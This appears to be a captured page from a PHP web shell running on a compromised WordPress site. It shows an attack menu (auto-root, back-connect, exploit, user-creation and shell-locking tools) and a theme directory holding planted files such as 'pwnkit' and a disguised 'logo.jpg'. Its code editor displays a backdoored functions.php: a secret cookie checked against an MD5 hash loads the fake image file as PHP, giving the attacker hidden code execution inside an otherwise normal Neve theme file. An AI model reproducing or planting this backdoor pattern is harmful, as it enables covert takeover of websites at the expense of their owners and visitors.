Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
neve /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
globals
[ DIR ]
drwxr-xr-x
gutenberg
[ DIR ]
drwxr-xr-x
header-footer-grid
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
108
B
-rw-r--r--
500.php
178
B
-rw-r--r--
CHANGELOG.md
14.71
KB
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
autoloader.php
4.05
KB
-rw-r--r--
comments.php
221
B
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
footer-pwa.php
147
B
-rw-r--r--
footer.php
535
B
-rw-r--r--
functions.php
2.76
KB
-rw-r--r--
functionsbak.php
2.28
KB
-rw-r--r--
header-pwa.php
680
B
-rw-r--r--
header.php
1.48
KB
-rw-r--r--
index.php
1.69
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
offline.php
178
B
-rw-r--r--
page.php
956
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.md
31.51
KB
-rw-r--r--
readme.txt
31.17
KB
-rw-r--r--
screenshot-mobile.png
17.77
KB
-rw-r--r--
screenshot.png
277.92
KB
-rw-r--r--
search.php
1.03
KB
-rw-r--r--
sidebar-shop.php
325
B
-rw-r--r--
sidebar.php
306
B
-rw-r--r--
single.php
1013
B
-rw-r--r--
start.php
1.21
KB
-rw-r--r--
style-rtl.css
57.57
KB
-rw-r--r--
style-rtl.min.css
46.39
KB
-rw-r--r--
style.css
57.6
KB
-rw-r--r--
style.min.css
46.36
KB
-rw-r--r--
toolset-config.json
4.33
KB
-rw-r--r--
wpml-config.xml
811
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /** * Neve functions.php file * * Author: Andrei Baicus <andrei@themeisle.com> * Created on: 17/08/2018 * * @package Neve */ define( 'NEVE_VERSION', '2.10.0' ); define( 'NEVE_INC_DIR', trailingslashit( get_template_directory() ) . 'inc/' ); define( 'NEVE_ASSETS_URL', trailingslashit( get_template_directory_uri() ) . 'assets/' ); if ( ! defined( 'NEVE_DEBUG' ) ) { define( 'NEVE_DEBUG', false ); } define( 'NEVE_NEW_DYNAMIC_STYLE', true ); /** * Themeisle SDK filter. * * @param array $products products array. * * @return array */ function neve_filter_sdk( $products ) { $products[] = get_template_directory() . '/style.css'; return $products; } add_filter( 'themeisle_sdk_products', 'neve_filter_sdk' ); add_filter( 'themeisle_onboarding_phprequired_text', 'neve_get_php_notice_text' ); /** * Get php version notice text. * * @return string */ function neve_get_php_notice_text() { $message = sprintf( /* translators: %s message to upgrade PHP to the latest version */ __( "Hey, we've noticed that you're running an outdated version of PHP which is no longer supported. Make sure your site is fast and secure, by %s. Neve's minimal requirement is PHP 5.4.0.", 'neve' ), sprintf( /* translators: %s message to upgrade PHP to the latest version */ '<a href="https://wordpress.org/support/upgrade-php/">%s</a>', __( 'upgrading PHP to the latest version', 'neve' ) ) ); return wp_kses_post( $message ); } /** * Adds notice for PHP < 5.3.29 hosts. */ function neve_php_support() { printf( '<div class="error"><p>%1$s</p></div>', neve_get_php_notice_text() ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } if ( version_compare( PHP_VERSION, '5.3.29' ) <= 0 ) { /** * Add notice for PHP upgrade. */ add_filter( 'template_include', '__return_null', 99 ); switch_theme( WP_DEFAULT_THEME ); unset( $_GET['activated'] ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended add_action( 'admin_notices', 'neve_php_support' ); return; } require_once 'globals/migrations.php'; require_once 'globals/utilities.php'; require_once 'globals/hooks.php'; require_once 'globals/sanitize-functions.php'; require_once get_template_directory() . '/start.php'; require_once get_template_directory() . '/header-footer-grid/loader.php';
Close